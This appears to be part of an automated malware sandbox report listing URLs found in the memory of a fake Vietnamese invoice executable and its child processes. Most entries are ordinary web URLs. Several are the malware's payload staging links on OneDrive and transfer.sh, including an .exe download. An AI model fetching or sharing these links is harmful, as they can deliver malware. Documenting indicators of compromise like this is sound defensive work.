              Source: aspnet_compiler.exe, 0000000E.00000003.389075530.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386841625.000000000274F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401748327.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433671270.00000000028E6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463192812.0000000003016000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481477826.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.500671413.0000000000A56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
              Source: bhv8995.tmp.39.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
              Source: bhv8995.tmp.39.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
              Source: bhv8995.tmp.39.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
              Source: bhv8995.tmp.39.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
              Source: bhv8995.tmp.39.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
              Source: bhv8995.tmp.39.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
              Source: bhv8995.tmp.39.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
              Source: bhv8995.tmp.39.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
              Source: bhv8995.tmp.39.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
              Source: bhvF833.tmp.14.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
              Source: bhv8995.tmp.39.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
              Source: bhv8995.tmp.39.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.355126935.000000000253C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kpf0yw.am.files.1drv.com/y4m6O4Ornh9bC3LU6E6AhRMu7htyE0P8yda7QdnFwV6RfxyvsjxNs5Be-VablD5fo4Z
              Source: Shhejayly.exe, 00000012.00000002.539080976.000000000254C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kpf0yw.am.files.1drv.com/y4mDTH7qGldoE19yex0JjOdCD7abQr3OT41x7HoVD-gSuwIqkSH1AKWWpBjmzkRc7T3
              Source: Shhejayly.exe, 0000001C.00000002.538759084.000000000252C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kpf0yw.am.files.1drv.com/y4mohw2-jA2-enkz0nKTLzUjPRBNoO5ZAah_FcRnfkog9p26ZH43g9AnI4ZgfSnm5Rt
              Source: Shhejayly.exe, 00000012.00000002.539080976.000000000254C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538759084.000000000252C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kpf0yw.am.files.1drv.com45k
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.355126935.000000000253C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kpf0yw.am.files.1drv.com45kT
              Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
              Source: aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
              Source: aspnet_compiler.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.537970433.000000000250C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.537475545.00000000024E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.537970433.000000000250C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.537475545.00000000024E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=B044AF3D48F7B886&resid=B044AF3D48F7B886
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeString found in binary or memory: https://onedrive.live.com/download?cid=B044AF3D48F7B886&resid=B044AF3D48F7B886%21122&authkey=AKVhH87
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://pki.goog/repository/0
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
              Source: dwn.exe, 00000011.00000002.538650865.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh
              Source: dwn.exe, 00000011.00000002.538650865.0000000002F81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/3GTNpY/Rtbdyyicls.bmp
              Source: dwn.exe, 00000011.00000000.374284805.0000000000AE2000.00000002.00000001.01000000.00000009.sdmp, dwn.exe.12.dr, Cuhcxlcg[1].exe.12.drString found in binary or memory: https://transfer.sh/get/3GTNpY/Rtbdyyicls.bmp%Pvdrkkndtbbqxgmhnq
              Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/J59PTO/Cuhcxlcg.exe
              Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/J59PTO/Cuhcxlcg.exeY
              Source: aspnet_compiler.exe, 0000000C.00000002.525361039.000000000137D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transfer.sh/get/J59PTO/Cuhcxlcg.exen
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google-analytics.com/analytics.js
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
              Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/
              Source: aspnet_compiler.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/
              Source: bhvF833.tmp.14.drString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
              Source: bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
              Source: bhv8995.tmp.39.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
              Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
              Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
              Source: Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
